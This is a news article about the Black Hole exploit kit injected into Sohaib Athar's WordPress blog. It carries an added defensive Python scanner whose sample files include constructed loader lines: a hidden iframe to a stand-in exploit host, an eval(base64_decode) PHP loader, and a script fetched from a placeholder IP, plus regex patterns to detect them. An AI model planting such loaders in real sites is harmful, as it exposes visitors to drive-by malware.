The blog run by the man who first tweeted the raid on Osama bin Laden's compound was compromised to load an exploit kit, according to researchers at Websense.
The blog, Reallyvirtual, is written by Sohaib Athar, a 33-year-old software consultant living in Abbottabad, the town two hours north of Islamabad where bin Laden was found and killed. Since the exploit kit was discovered, he has removed the injected code.
Patrik Runald, Senior Manager, Security Research at Websense, said the exploit kit was linked from the blog by only a single line of injected code. The kit, called Black Hole, is not itself malware or a virus. Rather, it probes the visitor's browser and its plug-ins for one of about 10 known vulnerabilities, and if it finds one, it exploits it to push malware, viruses or Trojans onto the visitor's machine.
Runald said this exploit kit was delivering a piece of fake anti-virus software that asks users to pay for repair of their systems, even though there are no problems. Because the installation happens silently when a visitor merely loads the page, such infections are called drive-by downloads.
How the injected code got onto the blog isn't clear, Runald said. Athar is using an old version of WordPress as a platform for the blog, but the code might have been inserted through a SQL injection attack, via a plug-in (such as the one linking to Twitter) or even at the level of the hosting provider. Any blog could be infected this way and the blog owner would likely never know. It just shows how close most people are to malware, he said.
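The injection described above is a single line added to a theme, plug-in or upload that a visitor's browser loads without the site owner noticing. The script below is an added example, not code from the article, from Websense or from WordPress: it scans a WordPress file tree for the loader lines such injections typically use (a 1x1 or hidden iframe, a script tag pulling from a host the site does not normally use, or PHP that decodes and evals a blob). The file names, the allowlist of trusted hosts and the sample contents, including the `exploit-host.example` and `198.51.100.7` addresses, are constructed for the example. It goes slightly beyond the article, which mentions only the single injected line, by also catching the obfuscated PHP loader that is the other common form of the same compromise.

```python
"""Scan WordPress files for one-line exploit-kit loaders (added example)."""
import re
from pathlib import Path

# Hosts this site legitimately loads scripts from. Assumption for the example;
# a real site lists its own CDN, analytics and widget hosts.
TRUSTED_HOSTS = {"platform.twitter.com", "reallyvirtual.example"}

# Each pattern captures one shape of injected loader line.
PATTERNS = {
    # <iframe ... width="1" height="1"> or width=0: invisible to the visitor
    "hidden_iframe": re.compile(
        r'<iframe[^>]*\b(?:width|height)\s*=\s*["\']?[01](?:px)?["\'\s>/]', re.I),
    # <iframe ... style="visibility:hidden"> or display:none
    "invisible_style": re.compile(
        r'<iframe[^>]*style\s*=\s*["\'][^"\']*(?:visibility\s*:\s*hidden|display\s*:\s*none)', re.I),
    # <script src="http://host/..."> ; host is checked against TRUSTED_HOSTS
    "external_script": re.compile(
        r'<script[^>]+src\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.I),
    # eval(base64_decode(...)) and friends: PHP that hides what it runs
    "php_eval_decode": re.compile(
        r'eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I),
}

SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}


def scan_text(name, text):
    """Return one finding per suspicious line: {file, line, labels, text}."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        labels = []
        for label, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            # An external script is only suspicious if the host is not ours.
            if label == "external_script" and m.group(1).lower() in TRUSTED_HOSTS:
                continue
            labels.append(label)
        if labels:
            findings.append({"file": name, "line": lineno,
                             "labels": labels, "text": line.strip()[:100]})
    return findings


def scan_files(files):
    """Scan an in-memory mapping of path -> contents (used for the sample)."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_text(name, text))
    return findings


def scan_tree(root):
    """Scan a real WordPress install on disk, e.g. scan_tree('/var/www/blog')."""
    files = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES:
            files[str(p)] = p.read_text(errors="replace")
    return scan_files(files)


# Constructed sample install: a clean header and post template, an injected
# footer, an obfuscated plug-in and a rogue file dropped into uploads/.
SAMPLE_FILES = {
    "wp-content/themes/twentyten/header.php":
        "<?php wp_head(); ?>\n"
        '<script src="https://platform.twitter.com/widgets.js"></script>\n',
    "wp-content/themes/twentyten/single.php":
        '<iframe width="560" height="315" src="https://www.youtube.example/embed/x"></iframe>\n',
    "wp-content/themes/twentyten/footer.php":
        "<?php wp_footer(); ?>\n"
        "</body></html>\n"
        '<iframe src="http://exploit-host.example/in.php" width="1" height="1" '
        'style="visibility:hidden"></iframe>\n',
    "wp-content/plugins/stats/stats.php":
        "<?php\n"
        "eval(base64_decode('aWYoIWlzc2V0KCRfQ09PS0lFWyd4J10pKQ=='));\n",
    "wp-content/uploads/cache.js":
        "document.write('<script src=\"http://198.51.100.7/x.js\"><\\/script>');\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} {','.join(f['labels'])}: {f['text']}")
```

Run it against a real install with `scan_tree()`; the visible YouTube embed and the allowlisted Twitter widget produce no findings, while the hidden iframe, the `eval(base64_decode(...))` plug-in and the script pulled from an unknown IP are each reported with the file and line number, which is what an owner needs to remove the injection and then look for how it got there.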
WordPress is a popular platform, so it is a common target for attack, Runald said. He added that the Black Hole exploit kit is a relatively new piece of software, having been spotted in the wild only several months ago.
Athar said in his tweets that he had seen helicopters in the area and that he was awake at 1 a.m. local time because of the noise. A few minutes later he tweeted: "A huge window shaking bang here in Abbottabad Cantt. I hope its not the start of something nasty :-S"